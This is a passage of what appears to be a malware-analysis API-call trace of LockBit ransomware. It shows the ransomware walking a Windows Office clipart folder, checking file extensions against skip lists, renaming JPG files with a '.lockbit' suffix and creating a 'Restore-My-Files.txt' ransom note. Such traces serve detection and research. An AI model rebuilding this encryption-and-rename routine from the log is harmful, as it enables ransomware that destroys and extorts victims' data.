Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0147.417] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178459.JPG") returned=".JPG" [0147.417] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0147.417] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0147.417] lstrcmpiW (lpString1=".7z", lpString2=".JPG") returned -1 [0147.417] lstrcmpiW (lpString1=".ckp", lpString2=".JPG") returned -1 [0147.417] lstrcmpiW (lpString1=".dacpac", lpString2=".JPG") returned -1 [0147.417] lstrcmpiW (lpString1=".db", lpString2=".JPG") returned -1 [0147.417] lstrcmpiW (lpString1=".db-shm", lpString2=".JPG") returned -1 [0147.417] lstrcmpiW (lpString1=".db-wal", lpString2=".JPG") returned -1 [0147.417] lstrcmpiW (lpString1=".db3", lpString2=".JPG") returned -1 [0147.418] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0147.418] lstrcmpiW (lpString1=".dbc", lpString2=".JPG") returned -1 [0147.418] lstrcmpiW (lpString1=".dbs", lpString2=".JPG") returned -1 [0147.418] lstrcmpiW (lpString1=".dbt", lpString2=".JPG") returned -1 [0147.418] lstrcmpiW (lpString1=".dbv", lpString2=".JPG") returned -1 [0147.418] lstrcmpiW (lpString1=".frm", lpString2=".JPG") returned -1 [0147.418] lstrcmpiW (lpString1=".mdf", lpString2=".JPG") returned 1 [0147.418] lstrcmpiW (lpString1=".mrg", lpString2=".JPG") returned 1 [0147.418] lstrcmpiW (lpString1=".mwb", lpString2=".JPG") returned 1 [0147.418] lstrcmpiW (lpString1=".myd", lpString2=".JPG") returned 1 [0147.418] lstrcmpiW (lpString1=".ndf", lpString2=".JPG") returned 1 [0147.418] lstrcmpiW (lpString1=".qry", lpString2=".JPG") returned 1 [0147.418] lstrcmpiW (lpString1=".sdb", lpString2=".JPG") returned 1 [0147.418] lstrcmpiW (lpString1=".sdf", lpString2=".JPG") returned 1 [0147.418] lstrcmpiW (lpString1=".sql", lpString2=".JPG") returned 1 [0147.418] lstrcmpiW (lpString1=".sqlite", lpString2=".JPG") returned 1 [0147.418] lstrcmpiW (lpString1=".sqlite3", lpString2=".JPG") returned 1 [0147.418] lstrcmpiW (lpString1=".sqlitedb", lpString2=".JPG") returned 1 [0147.418] lstrcmpiW (lpString1=".tmd", lpString2=".JPG") returned 1 [0147.418] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178459.JPG.lockbit") returned 72 [0147.419] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178459.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0178459.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0147.419] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0147.420] malloc (_Size=0x40068) returned 0x3e70008 [0147.420] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3e70020 | out: lpFileSize=0x3e70020*=29204) returned 1 [0147.420] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0147.420] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0147.420] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb003c) returned 0x0 [0147.420] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0147.421] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0147.421] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb004c) returned 0x0 [0147.421] ReadFile (in: hFile=0x170, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 0x0 [0147.426] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178459.JPG.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178459.JPG.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0147.426] malloc (_Size=0xa6) returned 0x77d7a8 [0147.426] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0147.427] free (_Block=0x77d7a8) [0147.427] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178459.JPG" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0147.427] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0147.428] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0147.428] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9ff99200, ftCreationTime.dwHighDateTime=0x1c97bb5, ftLastAccessTime.dwLowDateTime=0x65f99890, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x9ff99200, ftLastWriteTime.dwHighDateTime=0x1c97bb5, nFileSizeHigh=0x0, nFileSizeLow=0x67a3, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0178460.JPG", cAlternateFileName="")) returned 1 [0147.428] lstrcmpiW (lpString1=".", lpString2="J0178460.JPG") returned -1 [0147.428] lstrcmpiW (lpString1="..", lpString2="J0178460.JPG") returned -1 [0147.428] PathFindExtensionW (pszPath="J0178460.JPG") returned=".JPG" [0147.428] lstrcmpiW (lpString1=".386", lpString2=".JPG") returned -1 [0147.428] lstrcmpiW (lpString1=".cmd", lpString2=".JPG") returned -1 [0147.428] lstrcmpiW (lpString1=".exe", lpString2=".JPG") returned -1 [0147.428] lstrcmpiW (lpString1=".ani", lpString2=".JPG") returned -1 [0147.428] lstrcmpiW (lpString1=".adv", lpString2=".JPG") returned -1 [0147.428] lstrcmpiW (lpString1=".theme", lpString2=".JPG") returned 1 [0147.428] lstrcmpiW (lpString1=".msi", lpString2=".JPG") returned 1 [0147.428] lstrcmpiW (lpString1=".msp", lpString2=".JPG") returned 1 [0147.428] lstrcmpiW (lpString1=".com", lpString2=".JPG") returned -1 [0147.428] lstrcmpiW (lpString1=".diagpkg", lpString2=".JPG") returned -1 [0147.428] lstrcmpiW (lpString1=".nls", lpString2=".JPG") returned 1 [0147.428] lstrcmpiW (lpString1=".diagcab", lpString2=".JPG") returned -1 [0147.428] lstrcmpiW (lpString1=".lock", lpString2=".JPG") returned 1 [0147.429] lstrcmpiW (lpString1=".ocx", lpString2=".JPG") returned 1 [0147.429] lstrcmpiW (lpString1=".mpa", lpString2=".JPG") returned 1 [0147.429] lstrcmpiW (lpString1=".cpl", lpString2=".JPG") returned -1 [0147.429] lstrcmpiW (lpString1=".mod", lpString2=".JPG") returned 1 [0147.429] lstrcmpiW (lpString1=".hta", lpString2=".JPG") returned -1 [0147.429] lstrcmpiW (lpString1=".icns", lpString2=".JPG") returned -1 [0147.429] lstrcmpiW (lpString1=".prf", lpString2=".JPG") returned 1 [0147.429] lstrcmpiW (lpString1=".rtp", lpString2=".JPG") returned 1 [0147.429] lstrcmpiW (lpString1=".diagcfg", lpString2=".JPG") returned -1 [0147.429] lstrcmpiW (lpString1=".msstyles", lpString2=".JPG") returned 1 [0147.429] lstrcmpiW (lpString1=".bin", lpString2=".JPG") returned -1 [0147.429] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0147.429] lstrcmpiW (lpString1=".shs", lpString2=".JPG") returned 1 [0147.429] lstrcmpiW (lpString1=".drv", lpString2=".JPG") returned -1 [0147.429] lstrcmpiW (lpString1=".wpx", lpString2=".JPG") returned 1 [0147.429] lstrcmpiW (lpString1=".bat", lpString2=".JPG") returned -1 [0147.429] lstrcmpiW (lpString1=".rom", lpString2=".JPG") returned 1 [0147.429] lstrcmpiW (lpString1=".msc", lpString2=".JPG") returned 1 [0147.429] lstrcmpiW (lpString1=".spl", lpString2=".JPG") returned 1 [0147.429] lstrcmpiW (lpString1=".ps1", lpString2=".JPG") returned 1 [0147.429] lstrcmpiW (lpString1=".msu", lpString2=".JPG") returned 1 [0147.429] lstrcmpiW (lpString1=".ics", lpString2=".JPG") returned -1 [0147.430] lstrcmpiW (lpString1=".key", lpString2=".JPG") returned 1 [0147.430] lstrcmpiW (lpString1=".mp3", lpString2=".JPG") returned 1 [0147.430] lstrcmpiW (lpString1=".reg", lpString2=".JPG") returned 1 [0147.430] lstrcmpiW (lpString1=".dll", lpString2=".JPG") returned -1 [0147.430] lstrcmpiW (lpString1=".ini", lpString2=".JPG") returned -1 [0147.430] lstrcmpiW (lpString1=".idx", lpString2=".JPG") returned -1 [0147.430] lstrcmpiW (lpString1=".sys", lpString2=".JPG") returned 1 [0147.430] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0147.430] lstrcmpiW (lpString1=".ico", lpString2=".JPG") returned -1 [0147.430] lstrcmpiW (lpString1=".lnk", lpString2=".JPG") returned 1 [0147.430] lstrcmpiW (lpString1=".rdp", lpString2=".JPG") returned 1 [0147.430] lstrcmpiW (lpString1=".lockbit", lpString2=".JPG") returned 1 [0147.430] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0178460.JPG") returned 1 [0147.430] lstrcmpiW (lpString1="ntldr", lpString2="J0178460.JPG") returned 1 [0147.430] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0178460.JPG") returned 1 [0147.430] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0178460.JPG") returned -1 [0147.430] lstrcmpiW (lpString1="autorun.inf", lpString2="J0178460.JPG") returned -1 [0147.430] lstrcmpiW (lpString1="thumbs.db", lpString2="J0178460.JPG") returned 1 [0147.430] lstrcmpiW (lpString1="iconcache.db", lpString2="J0178460.JPG") returned -1 [0147.430] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0147.430] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178460.JPG") returned=".JPG" [0147.430] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0147.430] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0147.431] lstrcmpiW (lpString1=".7z", lpString2=".JPG") returned -1 [0147.431] lstrcmpiW (lpString1=".ckp", lpString2=".JPG") returned -1 [0147.431] lstrcmpiW (lpString1=".dacpac", lpString2=".JPG") returned -1 [0147.431] lstrcmpiW (lpString1=".db", lpString2=".JPG") returned -1 [0147.431] lstrcmpiW (lpString1=".db-shm", lpString2=".JPG") returned -1 [0147.431] lstrcmpiW (lpString1=".db-wal", lpString2=".JPG") returned -1 [0147.431] lstrcmpiW (lpString1=".db3", lpString2=".JPG") returned -1 [0147.431] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0147.431] lstrcmpiW (lpString1=".dbc", lpString2=".JPG") returned -1 [0147.431] lstrcmpiW (lpString1=".dbs", lpString2=".JPG") returned -1 [0147.431] lstrcmpiW (lpString1=".dbt", lpString2=".JPG") returned -1 [0147.431] lstrcmpiW (lpString1=".dbv", lpString2=".JPG") returned -1 [0147.431] lstrcmpiW (lpString1=".frm", lpString2=".JPG") returned -1 [0147.431] lstrcmpiW (lpString1=".mdf", lpString2=".JPG") returned 1 [0147.431] lstrcmpiW (lpString1=".mrg", lpString2=".JPG") returned 1 [0147.431] lstrcmpiW (lpString1=".mwb", lpString2=".JPG") returned 1 [0147.431] lstrcmpiW (lpString1=".myd", lpString2=".JPG") returned 1 [0147.431] lstrcmpiW (lpString1=".ndf", lpString2=".JPG") returned 1 [0147.431] lstrcmpiW (lpString1=".qry", lpString2=".JPG") returned 1 [0147.431] lstrcmpiW (lpString1=".sdb", lpString2=".JPG") returned 1 [0147.431] lstrcmpiW (lpString1=".sdf", lpString2=".JPG") returned 1 [0147.431] lstrcmpiW (lpString1=".sql", lpString2=".JPG") returned 1 [0147.431] lstrcmpiW (lpString1=".sqlite", lpString2=".JPG") returned 1 [0147.432] lstrcmpiW (lpString1=".sqlite3", lpString2=".JPG") returned 1 [0147.432] lstrcmpiW (lpString1=".sqlitedb", lpString2=".JPG") returned 1 [0147.432] lstrcmpiW (lpString1=".tmd", lpString2=".JPG") returned 1 [0147.432] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178460.JPG.lockbit") returned 72 [0147.432] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178460.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0178460.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0147.433] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0147.433] malloc (_Size=0x40068) returned 0x3f70048 [0147.435] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3f70060 | out: lpFileSize=0x3f70060*=26531) returned 1 [0147.435] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0147.435] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0147.435] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3fb007c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3fb007c) returned 0x0 [0147.435] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0147.436] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0147.436] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3fb008c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3fb008c) returned 0x0 [0147.436] ReadFile (in: hFile=0x308, lpBuffer=0x3f7007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048) returned 0x0 [0147.439] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178460.JPG.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178460.JPG.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0147.439] malloc (_Size=0xa6) returned 0x77d7a8 [0147.439] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0147.440] free (_Block=0x77d7a8) [0147.440] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178460.JPG" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0147.440] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0147.440] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0147.441] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7633f300, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x5649e8f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7633f300, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x5de2, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0178523.JPG", cAlternateFileName="")) returned 1 [0147.441] lstrcmpiW (lpString1=".", lpString2="J0178523.JPG") returned -1 [0147.441] lstrcmpiW (lpString1="..", lpString2="J0178523.JPG") returned -1 [0147.441] PathFindExtensionW (pszPath="J0178523.JPG") returned=".JPG" [0147.441] lstrcmpiW (lpString1=".386", lpString2=".JPG") returned -1 [0147.441] lstrcmpiW (lpString1=".cmd", lpString2=".JPG") returned -1 [0147.441] lstrcmpiW (lpString1=".exe", lpString2=".JPG") returned -1 [0147.441] lstrcmpiW (lpString1=".ani", lpString2=".JPG") returned -1 [0147.441] lstrcmpiW (lpString1=".adv", lpString2=".JPG") returned -1 [0147.441] lstrcmpiW (lpString1=".theme", lpString2=".JPG") returned 1 [0147.441] lstrcmpiW (lpString1=".msi", lpString2=".JPG") returned 1 [0147.441] lstrcmpiW (lpString1=".msp", lpString2=".JPG") returned 1 [0147.441] lstrcmpiW (lpString1=".com", lpString2=".JPG") returned -1 [0147.441] lstrcmpiW (lpString1=".diagpkg", lpString2=".JPG") returned -1 [0147.441] lstrcmpiW (lpString1=".nls", lpString2=".JPG") returned 1 [0147.441] lstrcmpiW (lpString1=".diagcab", lpString2=".JPG") returned -1 [0147.441] lstrcmpiW (lpString1=".lock", lpString2=".JPG") returned 1 [0147.441] lstrcmpiW (lpString1=".ocx", lpString2=".JPG") returned 1 [0147.442] lstrcmpiW (lpString1=".mpa", lpString2=".JPG") returned 1 [0147.442] lstrcmpiW (lpString1=".cpl", lpString2=".JPG") returned -1 [0147.442] lstrcmpiW (lpString1=".mod", lpString2=".JPG") returned 1 [0147.442] lstrcmpiW (lpString1=".hta", lpString2=".JPG") returned -1 [0147.442] lstrcmpiW (lpString1=".icns", lpString2=".JPG") returned -1 [0147.442] lstrcmpiW (lpString1=".prf", lpString2=".JPG") returned 1 [0147.442] lstrcmpiW (lpString1=".rtp", lpString2=".JPG") returned 1 [0147.442] lstrcmpiW (lpString1=".diagcfg", lpString2=".JPG") returned -1 [0147.442] lstrcmpiW (lpString1=".msstyles", lpString2=".JPG") returned 1 [0147.442] lstrcmpiW (lpString1=".bin", lpString2=".JPG") returned -1 [0147.442] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0147.442] lstrcmpiW (lpString1=".shs", lpString2=".JPG") returned 1 [0147.442] lstrcmpiW (lpString1=".drv", lpString2=".JPG") returned -1 [0147.442] lstrcmpiW (lpString1=".wpx", lpString2=".JPG") returned 1 [0147.442] lstrcmpiW (lpString1=".bat", lpString2=".JPG") returned -1 [0147.442] lstrcmpiW (lpString1=".rom", lpString2=".JPG") returned 1 [0147.442] lstrcmpiW (lpString1=".msc", lpString2=".JPG") returned 1 [0147.442] lstrcmpiW (lpString1=".spl", lpString2=".JPG") returned 1 [0147.442] lstrcmpiW (lpString1=".ps1", lpString2=".JPG") returned 1 [0147.442] lstrcmpiW (lpString1=".msu", lpString2=".JPG") returned 1 [0147.442] lstrcmpiW (lpString1=".ics", lpString2=".JPG") returned -1 [0147.442] lstrcmpiW (lpString1=".key", lpString2=".JPG") returned 1 [0147.442] lstrcmpiW (lpString1=".mp3", lpString2=".JPG") returned 1 [0147.443] lstrcmpiW (lpString1=".reg", lpString2=".JPG") returned 1 [0147.443] lstrcmpiW (lpString1=".dll", lpString2=".JPG") returned -1 [0147.443] lstrcmpiW (lpString1=".ini", lpString2=".JPG") returned -1 [0147.443] lstrcmpiW (lpString1=".idx", lpString2=".JPG") returned -1 [0147.443] lstrcmpiW (lpString1=".sys", lpString2=".JPG") returned 1 [0147.443] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0147.443] lstrcmpiW (lpString1=".ico", lpString2=".JPG") returned -1 [0147.443] lstrcmpiW (lpString1=".lnk", lpString2=".JPG") returned 1 [0147.443] lstrcmpiW (lpString1=".rdp", lpString2=".JPG") returned 1 [0147.443] lstrcmpiW (lpString1=".lockbit", lpString2=".JPG") returned 1 [0147.443] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0178523.JPG") returned 1 [0147.443] lstrcmpiW (lpString1="ntldr", lpString2="J0178523.JPG") returned 1 [0147.443] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0178523.JPG") returned 1 [0147.443] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0178523.JPG") returned -1 [0147.443] lstrcmpiW (lpString1="autorun.inf", lpString2="J0178523.JPG") returned -1 [0147.443] lstrcmpiW (lpString1="thumbs.db", lpString2="J0178523.JPG") returned 1 [0147.443] lstrcmpiW (lpString1="iconcache.db", lpString2="J0178523.JPG") returned -1 [0147.443] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0147.443] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178523.JPG") returned=".JPG" [0147.443] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0147.443] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0147.443] lstrcmpiW (lpString1=".7z", lpString2=".JPG") returned -1 [0147.443] lstrcmpiW (lpString1=".ckp", lpString2=".JPG") returned -1 [0147.444] lstrcmpiW (lpString1=".dacpac", lpString2=".JPG") returned -1 [0147.444] lstrcmpiW (lpString1=".db", lpString2=".JPG") returned -1 [0147.444] lstrcmpiW (lpString1=".db-shm", lpString2=".JPG") returned -1 [0147.444] lstrcmpiW (lpString1=".db-wal", lpString2=".JPG") returned -1 [0147.444] lstrcmpiW (lpString1=".db3", lpString2=".JPG") returned -1 [0147.444] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0147.444] lstrcmpiW (lpString1=".dbc", lpString2=".JPG") returned -1 [0147.444] lstrcmpiW (lpString1=".dbs", lpString2=".JPG") returned -1 [0147.444] lstrcmpiW (lpString1=".dbt", lpString2=".JPG") returned -1 [0147.444] lstrcmpiW (lpString1=".dbv", lpString2=".JPG") returned -1 [0147.444] lstrcmpiW (lpString1=".frm", lpString2=".JPG") returned -1 [0147.444] lstrcmpiW (lpString1=".mdf", lpString2=".JPG") returned 1 [0147.444] lstrcmpiW (lpString1=".mrg", lpString2=".JPG") returned 1 [0147.444] lstrcmpiW (lpString1=".mwb", lpString2=".JPG") returned 1 [0147.444] lstrcmpiW (lpString1=".myd", lpString2=".JPG") returned 1 [0147.444] lstrcmpiW (lpString1=".ndf", lpString2=".JPG") returned 1 [0147.444] lstrcmpiW (lpString1=".qry", lpString2=".JPG") returned 1 [0147.444] lstrcmpiW (lpString1=".sdb", lpString2=".JPG") returned 1 [0147.444] lstrcmpiW (lpString1=".sdf", lpString2=".JPG") returned 1 [0147.444] lstrcmpiW (lpString1=".sql", lpString2=".JPG") returned 1 [0147.444] lstrcmpiW (lpString1=".sqlite", lpString2=".JPG") returned 1 [0147.444] lstrcmpiW (lpString1=".sqlite3", lpString2=".JPG") returned 1 [0147.444] lstrcmpiW (lpString1=".sqlitedb", lpString2=".JPG") returned 1 [0147.444] lstrcmpiW (lpString1=".tmd", lpString2=".JPG") returned 1 [0147.444] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178523.JPG.lockbit") returned 72 [0147.445] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178523.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0178523.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x338 [0147.445] CreateIoCompletionPort (FileHandle=0x338, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0147.446] malloc (_Size=0x40068) returned 0x3fb00b8 [0147.447] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x3fb00d0 | out: lpFileSize=0x3fb00d0*=24034) returned 1 [0147.447] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0147.447] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0147.447] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3ff00ec, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3ff00ec) returned 0x0 [0147.447] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0147.448] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0147.448] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3ff00fc, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3ff00fc) returned 0x0 [0147.448] ReadFile (in: hFile=0x338, lpBuffer=0x3fb00ec, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3fb00b8 | out: lpBuffer=0x3fb00ec*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3fb00b8) returned 1 [0147.486] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178523.JPG.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178523.JPG.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0147.486] malloc (_Size=0xa6) returned 0x1fa2ed8 [0147.486] NtSetInformationFile (FileHandle=0x338, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0147.488] free (_Block=0x1fa2ed8) [0147.488] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178523.JPG" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0147.488] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0147.488] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0147.489] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7633f300, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x65f99890, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7633f300, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x5b2a, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0178632.JPG", cAlternateFileName="")) returned 1 [0147.489] lstrcmpiW (lpString1=".", lpString2="J0178632.JPG") returned -1 [0147.489] lstrcmpiW (lpString1="..", lpString2="J0178632.JPG") returned -1 [0147.489] PathFindExtensionW (pszPath="J0178632.JPG") returned=".JPG" [0147.489] lstrcmpiW (lpString1=".386", lpString2=".JPG") returned -1 [0147.489] lstrcmpiW (lpString1=".cmd", lpString2=".JPG") returned -1 [0147.489] lstrcmpiW 